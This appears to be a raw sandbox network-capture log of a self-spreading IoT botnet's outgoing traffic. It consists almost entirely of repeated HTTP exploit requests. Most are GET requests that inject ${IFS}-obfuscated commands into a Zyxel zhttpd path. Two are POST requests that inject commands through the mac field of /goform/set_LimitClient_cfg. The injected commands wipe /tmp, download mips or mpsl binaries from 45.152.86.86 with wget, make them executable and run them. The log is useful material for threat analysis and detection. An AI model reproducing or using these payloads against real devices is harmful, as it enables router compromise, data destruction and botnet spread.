                                        Mar 31, 2024 09:20:40.340748072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1773192.168.2.235087439.71.245.217443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340799093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1774192.168.2.234790476.237.50.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340852976 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1775192.168.2.2348988180.113.76.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340878010 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1776192.168.2.2356216131.112.240.66443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.340920925 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1777192.168.2.235112453.84.24.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.346345901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1778192.168.2.234235458.248.44.38443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347197056 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1779192.168.2.2360448123.147.27.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347234964 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1780192.168.2.236089243.164.158.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347282887 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1781192.168.2.2343986130.46.193.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347327948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1782192.168.2.2349350140.140.65.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347374916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1783192.168.2.2336752163.103.98.123443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347414017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1784192.168.2.234495883.142.88.239443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347440004 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1785192.168.2.2357432202.54.255.121443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347472906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1786192.168.2.2343246166.205.32.159443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347501040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1787192.168.2.235986834.12.237.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347557068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1788192.168.2.235094892.250.118.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347606897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1789192.168.2.2349252197.92.116.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347637892 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1790192.168.2.2354460149.252.214.75443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347682953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1791192.168.2.2359406114.35.95.226443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347735882 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1792192.168.2.2346586192.135.36.208443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347764015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1793192.168.2.233302819.61.119.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347805023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1794192.168.2.2335256186.101.44.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347840071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1795192.168.2.235620234.239.101.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347893953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1796192.168.2.2345468184.206.30.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347929001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1797192.168.2.2338494220.54.198.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:40.347959042 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1798192.168.2.2355332187.0.30.98080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.007302046 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:20:41.264684916 CEST69INHTTP/1.1 500 Internal Server Error
                                        Connection: Close


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1799192.168.2.234670082.18.140.69443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336133003 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1800192.168.2.2352680148.18.30.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336191893 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1801192.168.2.2334694161.155.88.60443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336229086 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1802192.168.2.23348305.31.99.23443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336260080 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1803192.168.2.235765473.154.119.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336311102 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1804192.168.2.2334656101.2.224.82443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336363077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1805192.168.2.2348676119.216.235.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336388111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1806192.168.2.2351662106.1.231.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336419106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1807192.168.2.2336028117.104.15.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336438894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1808192.168.2.2346942112.13.49.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336730957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1809192.168.2.2354654156.252.208.61443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336761951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1810192.168.2.2346684178.204.85.250443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336802006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1811192.168.2.2346212180.35.209.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336823940 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1812192.168.2.234304873.49.11.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.336874962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1813192.168.2.233297483.66.226.1228080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:41.917649984 CEST179OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1814192.168.2.235512476.175.107.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381123066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1815192.168.2.235333064.14.42.172443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381206036 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1816192.168.2.2349800160.236.84.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381254911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1817192.168.2.2333924105.178.137.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381305933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1818192.168.2.2357528123.34.36.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381342888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1819192.168.2.236093868.62.144.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381397963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1820192.168.2.2359296126.41.214.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381448984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1821192.168.2.2343834118.26.69.115443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381491899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1822192.168.2.2340430106.121.17.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381526947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1823192.168.2.233823847.199.254.57443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381594896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1824192.168.2.233553077.103.26.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381630898 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1825192.168.2.2359194171.89.249.144443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381685972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1826192.168.2.23421822.51.49.209443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381763935 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1827192.168.2.2350604211.162.29.124443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381798029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1828192.168.2.235730284.28.251.237443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381834030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1829192.168.2.2346772165.189.234.8443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381891012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1830192.168.2.234837895.7.18.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381927967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1831192.168.2.235997841.12.220.62443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.381958961 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1832192.168.2.2349872157.244.164.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382005930 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1833192.168.2.234159620.117.65.171443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382061005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1834192.168.2.233653419.61.240.40443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382091999 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1835192.168.2.233368061.2.4.28443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382132053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1836192.168.2.235928034.207.89.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:20:43.382186890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1837192.168.2.235196865.57.200.194443
                                        TimestampBytes transferredDirectionData
